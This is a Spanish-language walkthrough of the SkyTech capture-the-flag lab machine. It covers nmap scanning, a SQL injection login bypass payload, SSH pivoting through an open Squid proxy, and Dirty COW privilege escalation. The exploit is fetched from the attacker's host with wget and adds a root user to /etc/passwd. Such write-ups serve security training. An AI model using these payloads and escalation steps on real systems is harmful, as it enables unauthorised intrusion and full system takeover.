Ir al contenido
nyalex/docs

SkyTech

Descubrimiento

Sección titulada «Descubrimiento»

NMAP

Sección titulada «NMAP»

Como la máquina tiene un puerto HTTP:80, filtraré por eso en el escaneo de NMAP.

Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ nmap 172.20.0.0/24 -p 80 --open
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-27 15:07 CET
...


Nmap scan report for 172.20.0.191
Host is up (0.0014s latency).


PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:C0:0B:19 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
...


Nmap done: 256 IP addresses (48 hosts up) scanned in 25.73 seconds
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ nmap -T4 -sV -sC 172.20.0.191 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-27 15:16 CET
Nmap scan report for 172.20.0.191
Host is up (0.0069s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
3128/tcp open     http-proxy Squid http proxy 3.1.20
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported: GET HEAD
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:C0:0B:19 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.68 seconds

HTTP

Sección titulada «HTTP»
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ curl http://172.20.0.191/
<html>
        <body>


                <div style="height:100%; width:100%;background-image:url('background.jpg');
                                background-size:100%;
                                background-position:50% 50%;
                                background-repeat:no-repeat;">
                        <div style="
                                    background-color:white;
                                    border-color: #000000;
                                    border-width: 5px;
                                    border-style: solid;
                                    width: 300px;
                                    height:180px;
                                    position:absolute;
                                    top:50%;
                                    left:50%;
                                    margin-top:-100px; /* this is half the height of your div*/
                                    margin-left:-100px;
                                ">
                                        <form style="margin: 0 auto;width:250px;" action='login.php' method='POST'>
                                                <br><strong>Skytech Login:</strong><br><br>
                                                <label for="email" style="display: inline-block; width: 90px;" >E-mail:</label>
                                                <input name="email" type="text" size=15 ><br><br>
                                                <label for="password" style="display: inline-block; width: 90px;">Password:</label>
                                                <input name="password" type="password" size=15><br><br>
                                                <input type="submit" value="Login">
                                        </form>
                        </div>


                </div>
        </body>
</html>
POST /login.php HTTP/1.1
Host: 172.20.0.191
Content-Length: 22
Cache-Control: max-age=0
Accept-Language: es-ES,es;q=0.9
Origin: http://172.20.0.191
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.20.0.191/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive


email=asd&password=asd
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ sqlmap -r torres.req
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ sqlmap -r torres.req
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.11#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting @ 15:20:23 /2026-02-27/
...

HTTP Proxy

Sección titulada «HTTP Proxy»

http://172.20.0.191:3128/

proxy

Fuzzing

Sección titulada «Fuzzing»

HTTP

Sección titulada «HTTP»
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ ffuf -u http://172.20.0.191/FUZZ -w /mnt/d/Otros/wordlists/directory-list-2.3-big.txt -fc 404


        /'___\  /'___\           /.___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/


       v2.1.0-dev
________________________________________________


 :: Method           : GET
 :: URL              : http://172.20.0.191/FUZZ
 :: Wordlist         : FUZZ: /mnt/d/Otros/wordlists/directory-list-2.3-big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404
________________________________________________


index                   [Status: 200, Size: 1136, Words: 176, Lines: 34, Duration: 4431ms]
background              [Status: 200, Size: 2572609, Words: 12795, Lines: 10401, Duration: 2ms]

Explotación

Sección titulada «Explotación»

HTTP

Sección titulada «HTTP»
email='&password=asd
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2026 14:34:35 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Content-Length: 189
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asd'' at line 1]

' || 1=1 #

POST /login.php HTTP/1.1
Host: 172.20.0.191
Content-Length: 37
Cache-Control: max-age=0
Accept-Language: es-ES,es;q=0.9
Origin: http://172.20.0.191
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.20.0.191/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive


email=%27+%7C%7C+1%3D1+%23&password=a
Welcome john@skytech.com


As you may know, SkyTech has ceased all international operations.


To all our long term employees, we wish to convey our thanks for your dedication and hard work.


Unfortunately, all international contracts, including yours have been terminated.


The remainder of your contract and retirement fund, $2 ,has been payed out in full to a secure account. For security reasons, you must login to the SkyTech server via SSH to access the account details.


Username: john
Password: hereisjohn


We wish you the best of luck in your future endeavors.

SSH

Sección titulada «SSH»

El puerto SSH:22 que hay está filtrado, por lo que no puede accederse directamente. Para hacerlo, será seguramente necesario hacerlo a través del proxy.

Una rápida búsqueda muestra cómo hacer este tipo de conexiones.

ssh USER@FINAL_DEST -o "ProxyCommand=nc -X connect -x PROXYHOST:PROXYPORT %h %p"

Pero no funciona por sí solo, hay que especificar que sea HTTP.

ProxyCommand /usr/bin/ncat --proxy-type http --proxy 172.18.10.1:3128 %h %p

Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ ssh -t -o ProxyCommand="ncat --proxy 172.20.0.191:3128 --proxy-type http %h %p" john@localhost /bin/bash --noprofile --norc
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ ssh -t -o ProxyCommand="ncat --proxy 172.20.0.191:3128 --proxy-type http %h %p" john@localhost /bin/bash --noprofile --norc
The authenticity of host 'localhost (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is: SHA256:QYZqyNNW/Z81N86urjCUIrTBvJ06U9XDDzNv91DYaGc
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
john@localhost password:
Permission denied, please try again.
john@localhost's password:
bash-4.2$ id
uid=1000(john) gid=1000(john) groups=1000(john)
bash-4.2$ sudo -l
sudo: unable to resolve host ciber-5


We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:


    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.


[sudo] password for john:
Sorry, user john may not run sudo on ciber-5.
bash-4.2$

Estamos dentro.

Escalada

Sección titulada «Escalada»
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ searchsploit linux kernel 3.2.0 privilege escalation
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                              |  Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation                                                   | solaris/local/15962.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                                           | linux/local/50135.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)          | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)             | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)          | linux/local/40839.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1)                        | linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)                                        | linux/local/35161.c
Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation                                              | linux/local/38390.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation                              | linux_x86-64/local/33516.c
Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3)      | linux_x86-64/local/33589.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                                  | linux/local/41886.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation                                                           | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation                                                | linux_x86-64/local/44302.c
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation                                     | linux_x86-64/local/34134.c
Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation                                                   | arm/local/31574.c
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation                           | linux_x86-64/local/44299.c
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)                                          | linux_x86-64/local/26131.c
Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation                                  | linux/local/25450.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation                                                                | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation                                           | linux/local/45553.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                               | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                      | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                           | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                       | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)   | linux/local/47169.c
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

CLONE_NEWUSER

Sección titulada «CLONE_NEWUSER»
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ searchsploit -m 38390
  Exploit: Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/38390
     Path: /usr/share/exploitdb/exploits/linux/local/38390.c
    Codes: N/A
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/38390.c






┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ cp 38390.c /mnt/d/Otros/
Ventana de terminal
bash-4.2$ wget http://172.20.0.168/files/Otros/38390.c
--2026-02-27 10:01:35--  http://172.20.0.168/files/Otros/38390.c
Connecting to 172.20.0.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3762 (3.7K) [application/octet-stream]
Saving to: `38390.c'


100%[====================================================================================================================>] 3,762       --.-K/s   in 0s


2026-02-27 10:01:36 (22.0 MB/s) - `38390.c' saved [3762/3762]


bash-4.2$ ls -la
total 28
drwx------ 2 john john 4096 Feb 27 10:01 .
drwxr-xr-x 5 root root 4096 Jun 20  2014 ..
-rw-r--r-- 1 john john 3762 Feb 27 10:01 38390.c
-rw------- 1 john john    7 Jun 20  2014 .bash_history
-rw-r--r-- 1 john john  220 Jun 20  2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20  2014 .bashrc
-rw-r--r-- 1 john john  675 Jun 20  2014 .profile
bash-4.2$ chmod 777 38390.c
Ventana de terminal
bash: gcc: command not found
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ gcc 38390.c -o exploit -static


┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ cp exploit /mnt/d/Otros/
Ventana de terminal
bash-4.2$ ./exploit
[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer


[+] Found myself: '/home/john/exploit'
[*] Parent waiting for boomsh to appear ...
[*] Setting up chroot ...
[-] link: Operation not permitted

Dirty COW

Sección titulada «Dirty COW»
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ searchsploit -m 40839
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40839
     Path: /usr/share/exploitdb/exploits/linux/local/40839.c
    Codes: CVE-2016-5195
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/40839.c






┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ gcc -pthread 40839.c -o dirty -lcrypt -static


┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ cp dirty /mnt/d/Otros/
Ventana de terminal
bash-4.2$ wget http://172.20.0.168/files/Otros/dirty
--2026-02-27 10:07:16--  http://172.20.0.168/files/Otros/dirty
Connecting to 172.20.0.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1127608 (1.1M) [application/octet-stream]
Saving to: `dirty'


100%[====================================================================================================================>] 1,127,608    107K/s   in 11s


2026-02-27 10:07:27 (102 KB/s) - `dirty' saved [1127608/1127608]


bash-4.2$ chmod 777 dirty
bash-4.2$ mv dirty /tmp
bash-4.2$ cd /tmp
bash-4.2$ ls -la
total 1112
drwxrwxrwt  2 root root    4096 Feb 27 10:07 .
drwxr-xr-x 24 root root    4096 Jun 20  2014 ..
-rwxrwxrwx  1 john john 1127608 Feb 27 10:07 dirty
Ventana de terminal
bash-4.2$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fihn2.nq3JnMg:0:0:pwned:/root:/bin/bash


mmap: 7fe5a6e7f000


madvise 0


ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'asixcv'.




DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'asixcv'.




DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ ssh -t -o ProxyCommand="ncat --proxy 172.20.0.191:3128 --proxy-type http %h %p" john@localhost /bin/bash --noprofile --norc
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
john@localhost's password:
bash-4.2$ cat /etc/passwd
firefart:fihn2.nq3JnMg:0:0:pwned:/root:/bin/bash
/usr/g/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
john:x:1000:1000:john,,,:/home/john:/bin/bash
sara:x:1001:1001:,,,:/home/sara:/bin/bash
william:x:1002:1002:,,,:/home/william:/bin/bash
bash-4.2$ su firefart
Password:
firefart@ciber-5:/home/john# sudo -l
sudo: unknown user: root
sudo: unable to initialize policy plugin
firefart@ciber-5:/home/john# cd /root
firefart@ciber-5:~# ls -la
total 36
drwx------  4 firefart root 4096 Jun 20  2014 .
drwxr-xr-x 24 firefart root 4096 Jun 20  2014 ..
drwx------  2 firefart root 4096 Jun 20  2014 .aptitude
-rw-------  1 firefart root  265 Feb  3 15:03 .bash_history
-rw-r--r--  1 firefart root  570 Jan 31  2010 .bashrc
-rwx------  1 firefart root   69 Jun 20  2014 flag.txt
-rw-------  1 firefart root  268 Jun 20  2014 .mysql_history
-rw-r--r--  1 firefart root  140 Nov 19  2007 .profile
drwx------  2 firefart root 4096 Jun 20  2014 .ssh
Ventana de terminal
firefart@ciber-5:~# cat flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
firefart@ciber-5:~#